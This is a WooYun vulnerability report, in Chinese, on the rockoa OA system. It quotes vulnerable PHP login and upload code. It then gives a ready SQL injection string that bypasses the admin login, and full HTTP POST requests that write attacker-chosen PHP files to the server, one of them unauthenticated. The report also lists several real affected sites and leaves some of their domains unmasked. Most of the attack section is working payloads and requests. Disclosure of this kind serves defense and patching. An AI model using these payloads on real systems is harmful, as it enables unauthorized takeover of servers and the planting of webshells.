当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158998

漏洞标题:rockoa系统sql注入(有条件限制)

相关厂商:rockoa

漏洞作者: 路人甲

提交时间:2015-12-08 10:14

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

0x01 后台bypass
C:/phpStudy/WWW/rockoa/webrock/login/loginAction.php

public function checkAjax()
{
$adminuser = $this->post('adminuser');
$adminpass = $this->post('adminpass');
$rempass = $this->post('rempass');
$jmpass = $this->post('jmpass');
$adminpass1 = $adminpass;
if($jmpass == 'true')$adminpass=$this->jm->uncrypt($adminpass);
$highpass = HIGHPASS;
$lglx = '';
$msg = '';
if($this->isempt($adminuser))$msg='帐号不能为空';
$log = m('log');
if($msg==''){
$us = $this->db->getone('[Q]admin', "`user`='$adminuser' and `status`=1 and `type`=1 and `state`<>5",'`pass`,`id`,`name`,`user`,`style`');
if(!$us){
$msg = '帐号不存在';
}else{
$pass= $us['pass'];
if(md5($adminpass)!=$pass)$msg='密码不对';
if($adminpass==$highpass || $adminpass1 == $highpass){
$msg='';
$lglx = '超级密码';
}
}
}

if($msg==''){
$adminid = $us['id'];
$this->db->record('[Q]admin',"`loginci`=`loginci`+1,`lastdt`='$this->now',`lastip`='$this->ip'","`id`='$adminid'");
$this->rock->savesession(array(
QOM.'adminid' => $us['id'],
QOM.'adminname' => $us['name'],
QOM.'adminuser' => $us['user'],
QOM.'adminstyle'=> $us['style']
));

$this->rock->savecookie(QOM.'ca_adminuser', $us['user']);
$this->rock->savecookie(QOM.'ca_rempass', $rempass);
$ca_adminpass = $this->jm->encrypt($adminpass);
if($rempass=='0')$ca_adminpass='';
$this->rock->savecookie(QOM.'ca_adminpass', $ca_adminpass);
$this->rock->savecookie(QOM.'ca_adminstyle', $us['style']);
$msg='success';
$log->addlog('登录','['.$adminuser.']'.$lglx.'登录成功', array('optid'=>$us['id'], 'optname'=>$us['name']));
}else{
$log->addlog('登录','['.$adminuser.']'.$msg.'');
}
echo $msg;
}


在登陆的地方存在注入,但是会验证一次密码,所以我们通过union select 型的注入直接bypass,进入后台。
构造adminuser为

asd' union select '202cb962ac59075b964b07152d234b70',1,'管理员','admin',1#


adminpass为123
这样就可以直接进入后台了。

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


0x02 Getshell
第一种情况 需要登录,然后无限制getshell
C:/phpStudy/WWW/rockoa/modehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/uploadajax.php

if($action == 'send'){	
if(!$_POST)exit('Sorry!,send');
$sendci = (int)$rock->post('sendci')+1;
$maxsend = (int)$rock->post('maxsend');
$maxwidth = (int)$rock->post('maxwidth');
$thumbtype = (int)$rock->post('thumbtype');
$sendcont = $rock->post('sendcont');
$savetype = $rock->post('savetype','temp');
$filename = $rock->post('filename');
$filetype = $rock->post('filetype');
$fileext = trim($rock->post('fileext'));
$filesize = $rock->post('filesize');
$filesizecn = $rock->post('filesizecn');
$newfile = $rock->post('newfile');
$mkdir = $rock->post('mkdir');
$savepath = $rock->post('savepath');//另存路径
$thumbnail = $rock->post('thumbnail');
}
$smkdir = '../..https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/'.$mkdir.'';
if(!file_exists($smkdir))mkdir($smkdir);
$allfile = ''.$smkdir.'/'.$newfile.'';
$tempfile = $allfile.'.temp';
$filepath = substr($tempfile,3);
$thumbpath = '';//所累图地址
$width = 0;
$height = 0;
$fc = fopen($tempfile, 'a');
fwrite($fc,$sendcont);
fclose($fc);
$id = 0;
if($sendci==$maxsend){

$optid = (int)$rock->session(QOM.'adminid',0);
$imgext = '|jpg|gif|png|jpeg|bmp|';
$boolc = $rock->contain($imgext, '|'.$fileext.'|');
$ztfile = $imgext.'doc|docx|xls|xlsx|ppt|pptx|pdf|swf|rar|zip|txt|gz|wav|mp3|wma|chm|';
$botxtl = $rock->contain($ztfile,'|'.$fileext.'|');
$boolc1 = $rock->isempt($savepath);
if(!$boolc1 && $optid==0)$boolc1 = true;
$izztbo = false;
if(!$boolc1 || $botxtl)$izztbo = true;
if($izztbo){
$content = file_get_contents($tempfile);
$temp1file = ''.$allfile.'.'.$fileext.'';
$a64basec = base64_decode($content);

if(!$boolc1){
file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);
unlink($tempfile);
}else{
file_put_contents($temp1file, $a64basec);
unlink($tempfile);
if($boolc){
list($width, $height) = getimagesize($temp1file);
if($rock->isempt($width)){
$width = 0;
$height = 0;
}
}
}
$filepath = substr($temp1file,3);
}
$filepath = str_replace('../','',$filepath);
$thumbpath = $filepath;


这段代码的意思就是先生成一个temp文件,其中内容是base64过的,然后从temp文件里面读取内容并且base64解码一次,然后写入文件中。

file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);


其中savepath和filename变量我们都可以控制,这样就可以写shell了。
在进入这个流程之前,还有两个逻辑判断要izztbo变量为真 boolc1变量为假
其中if(!$boolc1 || $botxtl)$izztbo = true; 只要一个为真就行,由于boolc1又savepath是否为空的来,我们只要给savepath赋值即可。最好构造这样的数据包

POST /rockoa/modehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/modehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 222
Cookie: rock_ca_adminuser=admin; rock_ca_rempass=0; rock_ca_adminstyle=1; PHPSESSID=gkuo4ai9bcbciioepdv7u84k17
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sendcont=PD9waHAgcGhwaW5mbygpPz4=&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=06_1435027893&savepath=https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/&thumbnail=&maxwidth=0&thumbtype=0


就可以在upload下生成一个aax.php的shell
第二种情况 无需登录,但是有限制条件
由于没有登录所以$optid = (int)$rock->session(QOM.'adminid',0);获取的opted的值为0 在后面这个判断if(!$boolc1 && $optid==0)$boolc1 = true;导致boolc1为真,所以后面的流程都不能进去,就只能写一个tempfile 了,由于$tempfile = $allfile.'.temp'; 所以只能配合apache的解析漏洞或者iis的解析漏洞利用了,直接构造数据包

POST /rockoa/modehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/modehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 211
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sendcont=<?php phpinfo()?>&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=test.php&savepath1=https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/&thumbnail=&maxwidth=0&thumbtype=0


然后生成

{success:true, msg:"246",filepath:"upload/2015-12/test.php.temp", sendci:1, thumbpath:"upload/2015-12/test.php.temp",width:0,height:0}


随便测试了一个

http://**.**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/2015-12/test.php.php


漏洞证明:

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


QQ20151207-0@2x.jpg

QQ20151207-1@2x.jpg


案例

http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**daik.pw/
http://the18.club/
http://**.**.**.**/

修复方案:

你们专业

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价